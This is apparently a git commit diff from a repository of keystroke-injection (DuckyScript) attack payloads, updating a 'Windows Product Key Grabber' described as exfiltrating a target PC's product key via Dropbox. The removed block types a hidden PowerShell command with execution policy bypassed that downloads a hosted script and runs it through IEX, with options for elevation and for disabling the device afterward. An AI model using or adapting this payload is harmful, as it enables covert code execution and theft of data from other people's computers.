Merge pull request #474 from PlumpyTurkey/master
Fix “Windows Product Key Grabber” payloadpull/476/head
commit
ad08ba6e36
|
@ -8,7 +8,7 @@
|
|||
<img alt="TARGET: WINDOWS 10, 11" src="https://img.shields.io/badge/TARGET-WINDOWS_10,_11-blue?style=for-the-badge">
|
||||
</a>
|
||||
<a href="#">
|
||||
<img alt="VERSION: 1.1" src="https://img.shields.io/badge/VERSION-1.1-green?style=for-the-badge">
|
||||
<img alt="VERSION: 1.2" src="https://img.shields.io/badge/VERSION-1.2-green?style=for-the-badge">
|
||||
</a>
|
||||
</p>
|
||||
|
||||
|
|
|
@ -3,7 +3,7 @@ REM_BLOCK DOCUMENTATION
|
|||
Author: PlumpyTurkey
|
||||
Description: This payload sends you the target PC's Windows product key via Dropbox.
|
||||
Target: Windows 10, 11
|
||||
Version: 1.1
|
||||
Version: 1.2
|
||||
Category: Exfiltration
|
||||
END_REM
|
||||
|
||||
|
@ -108,39 +108,4 @@ EXTENSION WINDOWS_ONLY
|
|||
END_IF
|
||||
END_EXTENSION
|
||||
|
||||
EXTENSION RUN_HOSTED_POWERSHELL
|
||||
REM_BLOCK DOCUMENTATION
|
||||
Title: Run Hosted PowerShell
|
||||
Author: PlumpyTurkey
|
||||
Description: This extension executes a hosted PowerShell script using the Windows Run dialog box.
|
||||
Target: Windows 10, 11
|
||||
Version: 1.0
|
||||
END_REM
|
||||
|
||||
REM Required options:
|
||||
DEFINE #RHP_SCRIPT_URL example.com
|
||||
|
||||
REM Advanced options:
|
||||
DEFINE #RHP_DELAY 2000
|
||||
DEFINE #RHP_ELEVATED_EXECUTION FALSE
|
||||
DEFINE #RHP_DISABLE_AFTER_EXECUTION FALSE
|
||||
|
||||
GUI r
|
||||
|
||||
DELAY #RHP_DELAY
|
||||
STRING PowerShell -W H -EX Bypass "IWR -UseB '#RHP_SCRIPT_URL' | IEX"
|
||||
|
||||
IF_DEFINED_TRUE #RHP_ELEVATED_EXECUTION
|
||||
CTRL SHIFT ENTER
|
||||
DELAY #RHP_DELAY
|
||||
LEFT
|
||||
END_IF_DEFINED
|
||||
|
||||
ENTER
|
||||
|
||||
IF_DEFINED_TRUE #RHP_DISABLE_AFTER_EXECUTION
|
||||
ATTACKMODE OFF
|
||||
END_IF_DEFINED
|
||||
END_EXTENSION
|
||||
|
||||
RHP_RUN()
|
||||
|
|
Loading…
Reference in New Issue